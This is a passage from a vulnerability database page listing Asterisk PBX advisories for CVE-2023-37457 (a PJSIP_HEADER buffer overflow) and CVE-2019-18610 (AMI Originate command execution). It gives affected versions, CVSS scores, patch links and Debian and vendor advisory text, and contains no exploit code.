        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "16.8.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "18.9"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "19.0.0"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "21.0.0"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "18.20.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "13.13.0"
      },
      {
        "model": "asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "digium",
        "version": null
      },
      {
        "model": "certified asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "sangoma",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Debian",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2023-37457",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2023-37457",
            "impactScore": 4.2,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security-advisories@github.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2023-37457",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.2,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2023-37457",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2023-37457",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security-advisories@github.com",
            "id": "CVE-2023-37457",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2023-37457",
            "trust": 0.8,
            "value": "High"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49294\n\n    It is possible to read any arbitrary file even when the `live_dangerously`\n    option is not enabled. \n\nCVE-2023-49786\n\n   Asterisk is susceptible to a DoS due to a race condition in the hello\n   handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n   setup. This attack can be done continuously, thus denying new DTLS-SRTP\n   encrypted calls during the attack. Abuse of this vulnerability may lead to\n   a massive Denial of Service on vulnerable Asterisk servers for calls that\n   rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-37457",
        "trust": 2.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "176383",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "id": "VAR-202312-1059",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.75
  },
  "last_update_date": "2024-08-14T14:30:07.728000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-98rc-4j27-74hh"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/asterisk"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "date": "2024-01-05T14:31:02",
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "date": "2023-12-14T20:15:52.260000",
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T02:56:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      },
      {
        "date": "2023-12-29T00:15:49.697000",
        "db": "NVD",
        "id": "CVE-2023-37457"
      }
    ]
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Classic buffer overflow vulnerabilities in products from multiple vendors",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020247"
      }
    ],
    "trust": 0.8
  }
}

var-201911-1169

Vulnerability from variot

An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.

                           Affected Versions       
                     Product                       Release  
                                                   Series   
              Asterisk Open Source                  13.x    All releases  
              Asterisk Open Source                  16.x    All releases  
              Asterisk Open Source                  17.x    All releases  
               Certified Asterisk                   13.21   All releases

                              Corrected In                   
                          Product                              Release    
                   Asterisk Open Source                        13.29.2    
                   Asterisk Open Source                        16.6.2     
                   Asterisk Open Source                        17.0.1     
                    Certified Asterisk                       13.21-cert5

                                 Patches                         
                           SVN URL                                Revision

http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13 http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16 http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17 http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified
Asterisk
13.21-cert5

Links  https://issues.asterisk.org/jira/browse/ASTERISK-28580

Asterisk Project Security Advisories are posted at                        
http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest      
version will be posted at                                                 
http://downloads.digium.com/pub/security/AST-2019-007.pdf and             
http://downloads.digium.com/pub/security/AST-2019-007.html

                            Revision History
      Date            Editor                  Revisions Made              
October 24, 2019   George Joseph  Initial Revision                        
November 21, 2019  Ben Ford       Added “Posted On” date

           Asterisk Project Security Advisory - AST-2019-007
           Copyright © 2019 Digium, Inc. All Rights Reserved.

Permission is hereby granted to distribute and publish this advisory in its original, unaltered form

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1169",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.29.2"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.21.0"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "16.0.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "16.6.2"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "17.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "17.0.1"
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "digium",
        "version": "13.x"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "16.x"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "17.x"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "13.21 to  13.21-cert4"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=13.*"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=16.*"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=17.*"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "13.21"
      },
      {
        "model": "certified asterisk 13.21-cert4",
        "scope": null,
        "trust": 0.6,
        "vendor": "sangoma",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:debian:debian_linux",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:asterisk",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:certified_asterisk",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "gjoseph",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155435"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-18610",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2019-18610",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2020-03060",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2019-18610",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-18610",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-18610",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-18610",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-03060",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1290",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.                \n\n                               Affected Versions       \n                         Product                       Release  \n                                                       Series   \n                  Asterisk Open Source                  13.x    All releases  \n                  Asterisk Open Source                  16.x    All releases  \n                  Asterisk Open Source                  17.x    All releases  \n                   Certified Asterisk                   13.21   All releases  \n\n                                  Corrected In                   \n                              Product                              Release    \n                       Asterisk Open Source                        13.29.2    \n                       Asterisk Open Source                        16.6.2     \n                       Asterisk Open Source                        17.0.1     \n                        Certified Asterisk                       13.21-cert5  \n\n                                     Patches                         \n                               SVN URL                                Revision   \n  http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff    Asterisk 13 \n  http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff    Asterisk 16 \n  http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff    Asterisk 17 \n  http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified   \n                                                                     Asterisk    \n                                                                     13.21-cert5 \n\n    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28580             \n\n    Asterisk Project Security Advisories are posted at                        \n    http://www.asterisk.org/security                                          \n                                                                              \n    This document may be superseded by later versions; if so, the latest      \n    version will be posted at                                                 \n    http://downloads.digium.com/pub/security/AST-2019-007.pdf and             \n    http://downloads.digium.com/pub/security/AST-2019-007.html                \n\n                                Revision History\n          Date            Editor                  Revisions Made              \n    October 24, 2019   George Joseph  Initial Revision                        \n    November 21, 2019  Ben Ford       Added \u201cPosted On\u201d date                  \n\n               Asterisk Project Security Advisory - AST-2019-007\n               Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "PACKETSTORM",
        "id": "155435"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-18610",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "155435",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4526",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4421",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "PACKETSTORM",
        "id": "155435"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "id": "VAR-201911-1169",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
